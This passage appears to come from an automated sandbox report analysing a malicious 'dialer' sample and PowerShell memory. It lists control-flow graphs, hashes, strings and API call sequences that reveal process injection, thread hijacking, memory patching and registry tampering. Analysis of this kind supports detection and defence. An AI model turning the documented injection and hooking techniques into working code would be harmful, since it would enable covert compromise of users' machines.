                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
                                                                                • String ID:
                                                                                • API String ID: 2329183550-0
                                                                                • Opcode ID: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
                                                                                • Instruction ID: 92fd4c9d4bf5e523b387991ca1588cf5da7e3d4d1533141ee0b86d24ca0661c9
                                                                                • Opcode Fuzzy Hash: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
                                                                                • Instruction Fuzzy Hash: FCA00210F1D682C2EA0FB7B5695A07C12716F95702F901834D00AF7292DE3F64596731

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 199 7ff6473426e8-7ff647342710 200 7ff647342716 199->200 201 7ff6473428be-7ff6473428c6 199->201 202 7ff64734271c-7ff647342723 200->202 203 7ff64734284a-7ff647342882 GetProcessHeap HeapAlloc K32EnumProcesses 200->203 204 7ff6473428cc-7ff6473428cf 201->204 205 7ff647342b0a-7ff647342b2e ReadFile 201->205 209 7ff647342729-7ff64734272c 202->209 210 7ff647342841-7ff647342843 ExitProcess 202->210 206 7ff647342888-7ff647342899 203->206 207 7ff647342c00-7ff647342c16 203->207 211 7ff647342b00-7ff647342b05 call 7ff647341768 204->211 212 7ff6473428d5-7ff6473428da 204->212 205->207 208 7ff647342b34-7ff647342b3b 205->208 206->207 214 7ff64734289f-7ff6473428b7 call 7ff6473410c0 206->214 208->207 215 7ff647342b41-7ff647342b55 call 7ff6473419ac 208->215 216 7ff6473427e4-7ff64734280f RegOpenKeyExW 209->216 217 7ff647342732-7ff647342735 209->217 211->207 218 7ff6473428e0-7ff6473428e3 212->218 219 7ff647342aa5-7ff647342ab8 call 7ff647341a44 212->219 239 7ff6473428b9 214->239 215->207 240 7ff647342b5b-7ff647342b61 215->240 223 7ff647342811-7ff64734281f RegDeleteValueW 216->223 224 7ff647342825-7ff64734283c call 7ff647341ac4 call 7ff647341768 call 7ff647341000 call 7ff6473417f8 216->224 225 7ff64734273b-7ff64734273e 217->225 226 7ff6473427d5-7ff6473427df 217->226 228 7ff647342921-7ff647342932 call 7ff647341a44 218->228 229 7ff6473428e5-7ff6473428ea 218->229 219->207 243 7ff647342abe-7ff647342acd call 7ff647341a44 219->243 223->224 224->207 234 7ff6473427c8-7ff6473427d0 225->234 235 7ff647342744-7ff647342749 225->235 226->207 228->207 245 7ff647342938-7ff64734295a ReadFile 228->245 229->207 237 7ff6473428f0-7ff64734291a call 7ff647341958 call 7ff647341984 ExitProcess 229->237 234->207 235->207 242 7ff64734274f-7ff647342773 ReadFile 235->242 239->207 246 7ff647342b67-7ff647342ba2 GetProcessHeap HeapAlloc call 7ff6473414e4 240->246 247 7ff647342beb 240->247 242->207 249 7ff647342779-7ff647342780 242->249 243->207 265 7ff647342ad3-7ff647342afb ShellExecuteW 243->265 245->207 253 7ff647342960-7ff647342967 245->253 268 7ff647342bd5-7ff647342bdb GetProcessHeap 246->268 269 7ff647342ba4-7ff647342baa 246->269 254 7ff647342bf2-7ff647342bfb call 7ff647342c18 247->254 249->207 257 7ff647342786-7ff64734279a call 7ff6473419ac 249->257 253->207 260 7ff64734296d-7ff6473429ab GetProcessHeap HeapAlloc ReadFile 253->260 254->207 257->207 276 7ff6473427a0-7ff6473427a6 257->276 266 7ff647342a97-7ff647342aa0 GetProcessHeap 260->266 267 7ff6473429b1-7ff6473429bd 260->267 265->207 272 7ff647342bde-7ff647342be9 HeapFree 266->272 267->266 273 7ff6473429c3-7ff6473429cf 267->273 268->272 269->268 274 7ff647342bac-7ff647342bbe 269->274 272->207 273->266 280 7ff6473429d5-7ff6473429e0 273->280 281 7ff647342bc0-7ff647342bc2 274->281 282 7ff647342bc4-7ff647342bcc 274->282 278 7ff6473427a8-7ff6473427b7 call 7ff6473410c0 276->278 279 7ff6473427bc-7ff6473427c3 276->279 278->207 279->254 285 7ff647342a05-7ff647342a91 lstrlenW GetProcessHeap HeapAlloc call 7ff6473418b8 * 3 call 7ff647342c18 GetProcessHeap HeapFree 280->285 286 7ff6473429e2-7ff6473429ed 280->286 281->282 287 7ff647342bd0 call 7ff6473416d8 281->287 282->268 283 7ff647342bce 282->283 283->274 285->266 286->266 291 7ff6473429f3-7ff647342a00 call 7ff647341db4 286->291 287->268 291->266
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                • String ID: SOFTWARE$dialerstager$open
                                                                                • API String ID: 3276259517-3931493855
                                                                                • Opcode ID: cc2dfd10ca6ce89d0433c572e31964bbe7f0f3f3498935daffa8bcdb63cf822c
                                                                                • Instruction ID: 4bca7251015f2e9e768539bc645f45dab2f7dd648f76dc7dff62bc290998e547
                                                                                • Opcode Fuzzy Hash: cc2dfd10ca6ce89d0433c572e31964bbe7f0f3f3498935daffa8bcdb63cf822c
                                                                                • Instruction Fuzzy Hash: 7DD13D62A0C682C6EB7EFF2599042F923A5FF44748F014135E90ED7695DE3EEA04E740

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                • String ID: @
                                                                                • API String ID: 3462610200-2766056989
                                                                                • Opcode ID: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
                                                                                • Instruction ID: 8df78e516d6b14f41f8cbbb8c05d800459b2dc647212d3dc6ffe7da00a8c1416
                                                                                • Opcode Fuzzy Hash: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
                                                                                • Instruction Fuzzy Hash: D861A132B09A11C6E769AF26D84076E77E1FB48B88F004235DE4D97B58DF3AE845D740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                • String ID: dialersvc64
                                                                                • API String ID: 4184240511-3881820561
                                                                                • Opcode ID: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
                                                                                • Instruction ID: 9dfccbbc72e7d50390d5706d95404b040c750d7e05bafb5cbb0df3a7e8c7fdba
                                                                                • Opcode Fuzzy Hash: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
                                                                                • Instruction Fuzzy Hash: 6F415A32B08B46D6E715EF25E8442AD73B5FB88B88F044135EE4E97A24DF3AE549D300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Delete$CloseEnumOpen
                                                                                • String ID: SOFTWARE\dialerconfig
                                                                                • API String ID: 3013565938-461861421
                                                                                • Opcode ID: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
                                                                                • Instruction ID: c37a31dd6aa742a867d780fd5a19b365942d3a4ef96dfea09dd43e005c0dea9c
                                                                                • Opcode Fuzzy Hash: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
                                                                                • Instruction Fuzzy Hash: 92119122A1CA85C1E765AF24E8487F92364FB48798F400335D64D8AA98CF3ED248DB15
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: File$Write$CloseCreateHandle
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 148219782-3440882674
                                                                                • Opcode ID: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
                                                                                • Instruction ID: 94a394448baaafbd882dc457d4c1b35388c210f04e63a6837c784238f57ed5ba
                                                                                • Opcode Fuzzy Hash: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
                                                                                • Instruction Fuzzy Hash: 3811A032B18B5082E719EB01E8083296360FB88FE0F444235DA5D43B94CF7DD509C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 1646373207-2227199552
                                                                                • Opcode ID: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
                                                                                • Instruction ID: bcf0104a46047052cc5b5009feca99cbc9d657ff29b5d39db6639fd4f5d9f7a1
                                                                                • Opcode Fuzzy Hash: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
                                                                                • Instruction Fuzzy Hash: C7D01295F1EA07C2FE1FBB6668551705361AF5CB85F884430CD1ED7350DE2ED4959310
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p/6K
                                                                                • API String ID: 0-293107504
                                                                                • Opcode ID: a71ea22f4aff410cad356d445b27a5677cc88e4f01170d7281109fab50bbdd3b
                                                                                • Instruction ID: ce15701a44119e9818d02bbde7b76f1587080759b873f7a493eb3c1256d8bff9
                                                                                • Opcode Fuzzy Hash: a71ea22f4aff410cad356d445b27a5677cc88e4f01170d7281109fab50bbdd3b
                                                                                • Instruction Fuzzy Hash: A1417B6292CA464FEB95EE3CC59227077E1EF85324B4841FAC24EC79A7DE14E8058785
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p/6K
                                                                                • API String ID: 0-293107504
                                                                                • Opcode ID: ba1add593d2e72f4a7f42ff7e9f34946104deaa63fc526afdb6aa3081b53c6cf
                                                                                • Instruction ID: 491086db7ed07c5385bcad183d1c3c7e4baa0a28255f0764223c92ecffaf3dc7
                                                                                • Opcode Fuzzy Hash: ba1add593d2e72f4a7f42ff7e9f34946104deaa63fc526afdb6aa3081b53c6cf
                                                                                • Instruction Fuzzy Hash: B72159A292DA474FEBA5EE2CD5D213476E1EF8831474841F9D14EC39B7CE18EC048B85
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 87830947c711a23c253ea971f7d79f63030e7a0361cddc8a3c7b10cea5cbf01d
                                                                                • Instruction ID: ccaeee0b6f6f4613cb2c91c5a89a2c7cb16a3c5e20a93abd64a8104052cb22ec
                                                                                • Opcode Fuzzy Hash: 87830947c711a23c253ea971f7d79f63030e7a0361cddc8a3c7b10cea5cbf01d
                                                                                • Instruction Fuzzy Hash: 256169B291DB880FEB56EF3CD9925A43BE0EF86324B0841FAD54DC75A3D918AC05C791
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1608341505.00007FFB4B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b030000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3b9ee35e29e43e608eadd47d8cad8d8b03bbed87676a22ce6df5e99d72337336
                                                                                • Instruction ID: 6be4a439bce18ce318414d38d816a61390ae44f341bba0dd33234c6a12b61fe1
                                                                                • Opcode Fuzzy Hash: 3b9ee35e29e43e608eadd47d8cad8d8b03bbed87676a22ce6df5e99d72337336
                                                                                • Instruction Fuzzy Hash: 6D31167191CB4C4FDB18DB5CD84A6A87BE0FB99321F00426FE449C3262DB74A856CBC2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1606427460.00007FFB4AF1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4af1d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cd0ce609280529c2ea213f108c1857ed6d850fa5378f39310816b50706579d92
                                                                                • Instruction ID: 3e104edbfbe946fe6277c7092308cd962ddeafbf1fe24b47d3d602623c41386b
                                                                                • Opcode Fuzzy Hash: cd0ce609280529c2ea213f108c1857ed6d850fa5378f39310816b50706579d92
                                                                                • Instruction Fuzzy Hash: 2B41AE7140DBC44FE7569F39D8459623FB4EF56320B1906DFD088CB1A3DA29A84AC7A2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1608341505.00007FFB4B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b030000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 682df2e3f31fbcdf48bd1451fc4f76557a268166de03150924c0b53e8275cb4a
                                                                                • Instruction ID: 49f4d98ca9c805b6aeaa53cac55acd4cbb7ba114382ed1818226f0afd6a27211
                                                                                • Opcode Fuzzy Hash: 682df2e3f31fbcdf48bd1451fc4f76557a268166de03150924c0b53e8275cb4a
                                                                                • Instruction Fuzzy Hash: 4D214C7190C74C4FEB59DFACD84A7E97BE0EB96321F04426FD448C3162D674940ACB92
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 514ada7b9e821efe761753b1127b755a418f01957ec6098ad5a3e6522b16c182
                                                                                • Instruction ID: 298cbcb89c4f57cc2f2a57600b6bcf1ac0e3fbc90831c9d208061accc2b80d48
                                                                                • Opcode Fuzzy Hash: 514ada7b9e821efe761753b1127b755a418f01957ec6098ad5a3e6522b16c182
                                                                                • Instruction Fuzzy Hash: 4A1136B2A2DA454FEBA5EF2CD5D267437E0EF44364B0900FAE24DC79A3D918AC008B51
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1608341505.00007FFB4B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b030000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                                                • Instruction ID: 0cc64bf5f3558d98280f025c1af5d4fbb096b054bceaf4e090f5acb51a2c712c
                                                                                • Opcode Fuzzy Hash: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                                                • Instruction Fuzzy Hash: A701677111CB0C8FDB44EF5CE451AA5B7E0FB95364F10056EE58AC3661D636E882CB46
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1608341505.00007FFB4B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b030000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5e3c35425721939ddeebcfcf0c7456bc70abbb9e72feb731737cce0222ec37ee
                                                                                • Instruction ID: e9c64f58cd36fbff62c21950f60f5c03bc07ef03f717ad4169392158308d79ec
                                                                                • Opcode Fuzzy Hash: 5e3c35425721939ddeebcfcf0c7456bc70abbb9e72feb731737cce0222ec37ee
                                                                                • Instruction Fuzzy Hash: 8BE06D75409A8C8FCB45EF28C8594A97FE0FF65205B05029BE40DC7162DB719958CB82
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 42dc5f7c46fed4dba428ea9aeb794abce13483d4f54361d2ea607a90aa63c182
                                                                                • Instruction ID: 81b1c0b12057c1cc0c2f5450240b22b69ede68c6a8fbbaa2c8e9464956aee7d1
                                                                                • Opcode Fuzzy Hash: 42dc5f7c46fed4dba428ea9aeb794abce13483d4f54361d2ea607a90aa63c182
                                                                                • Instruction Fuzzy Hash: 7BF0A03131CF044FE748EE2DE4497A2B7E1FBA8310F10462FE84AC3251DA21E8818782
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aab897b2d02aa54d217a1bf0a1af29a3b9486fc71b8606f3b3300a195734a072
                                                                                • Instruction ID: 1ec5b9f3f06d4d1063e6bf9413d9f369ccffc82406eda2f35a642976df9762b9
                                                                                • Opcode Fuzzy Hash: aab897b2d02aa54d217a1bf0a1af29a3b9486fc71b8606f3b3300a195734a072
                                                                                • Instruction Fuzzy Hash: BBF03071A1C419CFDA58FE1CE1819A873E4EF44325B1040B6E21EC3563DA26EC529B94
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 40ba4f69ce56bce1f899fafbe562b8767ca00547a4af2a566346c8b6d289168e
                                                                                • Instruction ID: 2bc1359e3b09880605076189455a29b6ef95d3b0898e89e053dc1e1f82834b1a
                                                                                • Opcode Fuzzy Hash: 40ba4f69ce56bce1f899fafbe562b8767ca00547a4af2a566346c8b6d289168e
                                                                                • Instruction Fuzzy Hash: EEE01A32A1C804CFDB68EF0DE5869E973E0EB54325B5190B6E25EC7532DB21EC519B84
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1608341505.00007FFB4B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b030000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aef0a7d47af5e60f36af30cb93e9e528a932e60ff3777b7e252a6d85ab1f59bc
                                                                                • Instruction ID: cac7c884af38601175d80c481ccf4e1cd11095b2506805a00f9d2d70d5ec2148
                                                                                • Opcode Fuzzy Hash: aef0a7d47af5e60f36af30cb93e9e528a932e60ff3777b7e252a6d85ab1f59bc
                                                                                • Instruction Fuzzy Hash: 7BE06D75408A8D8FCB44EF28C4495E57FE0FB28201F00019AE45DC6121D7709554CBC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.1608341505.00007FFB4B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffb4b030000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (C)K$0E)K$HC)K$XD)K$A)K
                                                                                • API String ID: 0-263351377
                                                                                • Opcode ID: e5902f9e75785dcaaafdf10205bb10397d7b88b991df44faca14cdf6ca170596
                                                                                • Instruction ID: 6cae0bbf16a2e83da95cfa20e1900833cffafc9f6e2314dd71640bf9d17d5b13
                                                                                • Opcode Fuzzy Hash: e5902f9e75785dcaaafdf10205bb10397d7b88b991df44faca14cdf6ca170596
                                                                                • Instruction Fuzzy Hash: 86A13BE3D0EBC20FE3515A7CADAD0A57F90EF6226570D51FBC1C98B2E7D80958068396

                                                                                Execution Graph

                                                                                Execution Coverage:1.1%
                                                                                Dynamic/Decrypted Code Coverage:94.3%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:105
                                                                                Total number of Limit Nodes:16
                                                                                execution_graph 24557 2e99175562d 24559 2e991755634 24557->24559 24558 2e99175569b 24559->24558 24560 2e991755717 VirtualProtect 24559->24560 24561 2e991755751 24560->24561 24562 2e991755743 GetLastError 24560->24562 24562->24561 24563 2e991755dd0 24564 2e991755ddd 24563->24564 24565 2e991755de9 24564->24565 24571 2e991755efa 24564->24571 24566 2e991755e1e 24565->24566 24567 2e991755e6d 24565->24567 24568 2e991755e46 SetThreadContext 24566->24568 24568->24567 24569 2e991755fde 24572 2e991755ffe 24569->24572 24583 2e9917544c0 VirtualFree 24569->24583 24570 2e991755f21 VirtualProtect FlushInstructionCache 24570->24571 24571->24569 24571->24570 24579 2e991754ed0 GetCurrentProcess 24572->24579 24574 2e991756003 24576 2e991756017 ResumeThread 24574->24576 24578 2e991756057 _handle_error 24574->24578 24577 2e99175604b 24576->24577 24577->24574 24580 2e991754eec 24579->24580 24581 2e991754f02 VirtualProtect FlushInstructionCache 24580->24581 24582 2e991754f33 24580->24582 24581->24580 24582->24574 24583->24572 24584 2e991753b99 24587 2e991753ae6 24584->24587 24585 2e991753b50 24586 2e991753b36 VirtualQuery 24586->24585 24586->24587 24587->24585 24587->24586 24588 2e991753b6a VirtualAlloc 24587->24588 24588->24585 24589 2e991753b9b GetLastError 24588->24589 24589->24587 24590 2e991752a7c 24592 2e991752ac1 24590->24592 24591 2e991752b20 24592->24591 24594 2e991753930 24592->24594 24595 2e99175393d StrCmpNIW 24594->24595 24596 2e991753952 24594->24596 24595->24596 24596->24592 24597 2e991782908 24598 2e991782936 24597->24598 24599 2e991782994 VirtualAlloc 24598->24599 24600 2e9917829b8 24598->24600 24599->24600 24601 2e991751c28 24607 2e991751650 GetProcessHeap 24601->24607 24603 2e991751c3e Sleep SleepEx 24605 2e991751c37 24603->24605 24605->24603 24606 2e9917515c0 StrCmpIW StrCmpW 24605->24606 24652 2e9917518dc 9 API calls 24605->24652 24606->24605 24608 2e991751670 _set_errno_from_matherr 24607->24608 24653 2e991751274 GetProcessHeap 24608->24653 24610 2e991751678 24611 2e991751274 2 API calls 24610->24611 24612 2e991751689 24611->24612 24613 2e991751274 2 API calls 24612->24613 24614 2e991751692 24613->24614 24615 2e991751274 2 API calls 24614->24615 24616 2e99175169b 24615->24616 24617 2e9917516b6 RegOpenKeyExW 24616->24617 24618 2e9917518ce 24617->24618 24619 2e9917516e8 RegOpenKeyExW 24617->24619 24618->24605 24620 2e991751727 RegOpenKeyExW 24619->24620 24621 2e991751711 24619->24621 24623 2e99175174b 24620->24623 24624 2e991751762 RegOpenKeyExW 24620->24624 24664 2e9917512c8 11 API calls 2 library calls 24621->24664 24657 2e99175104c RegQueryInfoKeyW 24623->24657 24625 2e99175179d RegOpenKeyExW 24624->24625 24626 2e991751786 24624->24626 24630 2e9917517d8 RegOpenKeyExW 24625->24630 24631 2e9917517c1 24625->24631 24665 2e9917512c8 11 API calls 2 library calls 24626->24665 24627 2e99175171d RegCloseKey 24627->24620 24635 2e9917517fc 24630->24635 24636 2e991751813 RegOpenKeyExW 24630->24636 24666 2e9917512c8 11 API calls 2 library calls 24631->24666 24633 2e991751793 RegCloseKey 24633->24625 24667 2e9917512c8 11 API calls 2 library calls 24635->24667 24639 2e99175184e RegOpenKeyExW 24636->24639 24640 2e991751837 24636->24640 24637 2e9917517ce RegCloseKey 24637->24630 24641 2e991751889 RegOpenKeyExW 24639->24641 24642 2e991751872 24639->24642 24644 2e99175104c 4 API calls 24640->24644 24646 2e9917518ad 24641->24646 24647 2e9917518c4 RegCloseKey 24641->24647 24645 2e99175104c 4 API calls 24642->24645 24643 2e991751809 RegCloseKey 24643->24636 24648 2e991751844 RegCloseKey 24644->24648 24649 2e99175187f RegCloseKey 24645->24649 24650 2e99175104c 4 API calls 24646->24650 24647->24618 24648->24639 24649->24641 24651 2e9917518ba RegCloseKey 24650->24651 24651->24647 24668 2e991763170 24653->24668 24656 2e9917512ba _set_errno_from_matherr 24656->24610 24658 2e9917510b9 24657->24658 24659 2e9917511b5 RegCloseKey 24657->24659 24658->24659 24660 2e9917510c7 RegEnumValueW 24658->24660 24659->24624 24662 2e99175111c _set_errno_from_matherr __free_lconv_num 24660->24662 24661 2e991751149 GetProcessHeap 24661->24662 24662->24659 24662->24660 24662->24661 24663 2e99175117f 